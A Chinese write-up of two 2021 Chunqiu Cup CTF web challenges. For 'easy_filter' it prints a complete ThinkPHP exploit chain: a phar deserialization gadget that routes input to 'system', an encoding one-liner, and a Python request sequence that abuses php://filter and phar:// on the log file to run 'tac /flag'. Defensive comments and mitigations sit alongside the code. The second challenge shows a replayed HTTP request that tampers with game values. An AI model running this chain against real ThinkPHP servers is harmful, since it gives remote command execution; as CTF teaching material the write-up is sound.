【wp】ctf-2021春秋杯

ctf-2021春秋杯

【wp】ctf-2021春秋杯



easy_filter


<?php
// Object graph later stored as phar metadata by the generator below. These classes are
// minimal stand-ins for framework classes of the same name: only the properties the
// serialized payload needs are declared, and the constructors do nothing but assign them.
// No framework logic runs at generation time; the values only matter once a framework
// instance that ships the real classes unserializes the metadata.
//
// Defensive takeaway: unserialize() of attacker-controlled bytes (here reached through the
// phar:// stream wrapper) lets property values like these steer framework code paths. Keep
// user input out of paths handed to filesystem functions, consider
// stream_wrapper_unregister('phar') where phar support is not needed, and keep framework
// classes with known gadget methods patched.
namespace think{
    // $append maps a key to a list of strings and $data holds a Request under the same
    // key. What the real framework class does with that pairing is not shown here
    // (presumably its array-conversion path -- verify against the target version).
    abstract class Model{
        protected $append = [];
        private $data = [];
        function __construct(){
            $this->append = ["ethan"=>["dir","calc"]];
            $this->data = ["ethan"=>new Request()];
        }
    }
    // $config mirrors the framework's request options, but the constructor below
    // re-assigns it, so only the constructor's values end up in the serialized object.
    class Request{
        protected $hook = [];
        protected $filter = "system";
        protected $config = [
        // form request-method spoofing variable
        'var_method'       => '_method',
        // form ajax spoofing variable
        'var_ajax'         => '_ajax',
        // form pjax spoofing variable
        'var_pjax'         => '_pjax',
        // PATHINFO variable name, used in compatibility mode
        'var_pathinfo'     => 's',
        // fallback keys for fetching PATH_INFO
        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
        // default global filter methods, comma-separated
        'default_filter'   => '',
        // domain root, e.g. thinkphp.cn
        'url_domain_root'  => '',
        // HTTPS proxy indicator
        'https_agent_name' => '',
        // header used to obtain the client IP behind a proxy
        'http_agent_ip'    => 'HTTP_X_REAL_IP',
        // URL pseudo-static suffix
        'url_html_suffix'  => 'html',
        ];
        // $filter names a PHP function ("system") and the "visible" hook points back at this
        // object's own isAjax. On the real framework class these presumably decide which
        // callable gets applied to request input -- TODO confirm against the target version.
        function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>''];
        $this->hook = ["visible"=>[$this,"isAjax"]];
        }
    }
}

// NOTE(review): the namespace separators look stripped by extraction -- "thinkprocesspipes",
// "thinkmodelPivot" and "thinkModel" read as joined path segments. As written, the `use`
// statements import top-level names that are never declared, so `Pivot` and `Model` would
// not resolve; the original presumably used backslash-separated namespaces.
namespace thinkprocesspipes{
    use thinkmodelconcernConversion; // imported but not used in this block
    use thinkmodelPivot;
    // Root of the serialized graph: holds a list with one Pivot, which is a Model and so
    // carries the Request configured above. What the real framework class does with
    // $files (e.g. on destruction) is not shown here.
    class Windows{
        private $files = [];
        public function __construct(){
            $this->files=[new Pivot()];
        }
    }
}
namespace thinkmodel{
    use thinkModel;
    // Concrete subclass so the abstract Model can be instantiated; adds nothing itself.
    class Pivot extends Model{

    }
}
namespace {
    use thinkprocesspipesWindows;
    // echo base64_encode(serialize(new Windows()));
    // Build phar.phar with the object graph as its manifest metadata. PHP filesystem
    // functions that accept stream wrappers unserialize this metadata when given a
    // phar:// path, which is why creating the archive is the client-side step and
    // restricting which paths reach file functions is the server-side fix.
    @unlink("phar.phar"); // start from a clean file; a missing file is silently ignored
    $phar = new Phar("phar.phar"); // the file name must end in .phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); // minimal valid stub
    $o = new Windows();
    $phar->setMetadata($o); // the object graph is serialized into the manifest here
    $phar->addFromString("test.txt", "test"); // any file content; only the metadata matters
    // the signature is computed automatically
    $phar->stopBuffering();
}
/*input=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&id=whoami*/
?>


# Re-encode the archive as text: base64 on one line (-w 0), then every character written as
# "=XX=00" with upper-case hex, i.e. the quoted-printable form of that text as UTF-16BE.
# The output is what the script below places in the request URL; the hex width and case
# matter, so keep the expression as-is if you reproduce it.
cat phar.phar | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"


# Request sequence from the writeup, annotated for defenders. Every request hits the same
# action with a caller-controlled `file` value, and the server evidently hands that value to
# a filesystem function with PHP stream wrappers enabled: php://filter with a write= chain on
# the framework log (steps 1 and 4), then phar:// on that same log (step 5). The fix is
# server-side: resolve `file` against an allowlist or a realpath inside a base directory and
# never let php:// or phar:// reach file functions. Detection: request URIs containing
# "php://filter/write=", "phar://", or long "=XX=00" runs in the access log.
import requests
# host = "http://127.0.0.1:80/public"
host ='http://eci-2ze5b7k5rcrtgb6lqz3z.cloudeci1.ichunqiu.com/index.php'
# Step 1: prime the log file with an encoding write-filter chain. Presumably the framework
# appends each request's details to this log, so later request data passes through the
# chain -- TODO confirm for the target framework/version.
burp0_url = host + "/index/index/hello?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log"
requests.get(burp0_url)
# Step 2: a throwaway request; the writeup does not say what it is for.
burp00_url = host + "/index/index/hello?file=AA"
requests.get(burp00_url)
# Step 3: the "=XX=00"-encoded archive produced by the shell one-liner above, sent as the
# `file` value so that it ends up in the log.
burp01_url = host + "/index/index/hello?file=AA=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=42=00=41=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=4C=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=79=00=4E=00=7A=00=6F=00=69=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=31=00=78=00=77=00=61=00=58=00=42=00=6C=00=63=00=31=00=78=00=58=00=61=00=57=00=35=00=6B=00=62=00=33=00=64=00=7A=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=4D=00=30=00=4F=00=69=00=49=00=41=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=31=00=78=00=77=00=61=00=58=00=42=00=6C=00=63=00=31=00=78=00=58=00=61=00=57=00=35=00=6B=00=62=00=33=00=64=00=7A=00=41=00=47=00=5A=00=70=00=62=00=47=00=56=00=7A=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=50=00=4F=00=6A=00=45=00=33=00=4F=00=69=00=4A=00=30=00=61=00=47=00=6C=00=75=00=61=00=31=00=78=00=74=00=62=00=32=00=52=00=6C=00=62=00=46=00=78=00=51=00=61=00=58=00=5A=00=76=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=68=00=63=00=48=00=42=00=6C=00=62=00=6D=00=51=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=6C=00=64=00=47=00=68=00=68=00=62=00=69=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=7A=00=4F=00=69=00=4A=00=6B=00=61=00=58=00=49=00=69=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=51=00=36=00=49=00=6D=00=4E=00=68=00=62=00=47=00=4D=00=69=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=78=00=4E=00=7A=00=6F=00=69=00=41=00=48=00=52=00=6F=00=61=00=57=00=35=00=72=00=58=00=45=00=31=00=76=00=5A=00=47=00=56=00=73=00=41=00=47=00=52=00=68=00=64=00=47=00=45=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=6C=00=64=00=47=00=68=00=68=00=62=00=69=00=49=00=37=00=54=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=64=00=47=00=68=00=70=00=62=00=6D=00=74=00=63=00=55=00=6D=00=56=00=78=00=64=00=57=00=56=00=7A=00=64=00=43=00=49=00=36=00=4D=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6F=00=62=00=32=00=39=00=72=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=64=00=6D=00=6C=00=7A=00=61=00=57=00=4A=00=73=00=5A=00=53=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=6A=00=6F=00=35=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6D=00=6C=00=7A=00=51=00=57=00=70=00=68=00=65=00=43=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=5A=00=70=00=62=00=48=00=52=00=6C=00=63=00=69=00=49=00=37=00=63=00=7A=00=6F=00=32=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=69=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=75=00=5A=00=6D=00=6C=00=6E=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=64=00=6D=00=46=00=79=00=58=00=32=00=46=00=71=00=59=00=58=00=67=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=44=00=6F=00=69=00=49=00=6A=00=74=00=39=00=66=00=58=00=31=00=39=00=66=00=58=00=30=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=2F=00=4D=00=65=00=78=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=61=00=47=00=63=00=79=00=42=00=72=00=68=00=73=00=64=00=4D=00=44=00=44=00=74=00=71=00=69=00=66=00=74=00=4A=00=7A=00=4D=00=71=00=41=00=6B=00=4B=00=46=00=49=00=49=00=43=00=41=00=41=00=41=00=41=00=52=00=30=00=4A=00=4E=00=51=00=67=00=3D=00=3D=00"
requests.get(burp01_url)
# Step 4: re-prime the log with the decoding direction of the chain, so the logged text is
# turned back into the archive bytes on disk.
burp02_url = host + "/index/index/hello?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log"
requests.get(burp02_url)
# Step 5: open the log through the phar:// wrapper, which unserializes the archive metadata;
# `id` is the extra input the resulting object graph acts on. The response body is printed.
burp03_url = host + "/index/index/hello?file=phar:///var/www/html/runtime/log/202105/29.log&id=tac /flag"
res = requests.get(burp03_url)
print(res.text)


【wp】ctf-2021春秋杯

flag{d94da2d7-574e-46b6-87a3-33c90fe3767a}



ctftaker


源码


【wp】ctf-2021春秋杯


POST /levelup HTTP/1.1Host: eci-2zebjnza8y58psty4hey.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1620482691; UM_distinctid=1794c4ba07562-01cbdedfb764ce8-c791039-1aeaa0-1794c4ba0769b9; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; __jsluid_h=954b9eeb8fc650893eb6696dbe7afbe5; session=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; session.sig=pvQuGF6QvbkG8T1pL9isXJmifzUUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheContent-Type: application/jsonContent-Length: 18
{"f":"12222+2222"}


获取大量攻击力等等


【wp】ctf-2021春秋杯


带着cookie 多次请求

得到flag


【wp】ctf-2021春秋杯


把[delay(1000*10)]替换成空


【wp】ctf-2021春秋杯


flag{fc2b633a-5f4a-4d26-94bf-3f152d4872b0}


更多CTF-Writeup 请关注EDI安全!
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。
欢迎各位大佬小白入驻,大家一起打CTF,一起进步




本文始发于微信公众号(bgbing安全):【wp】ctf-2021春秋杯
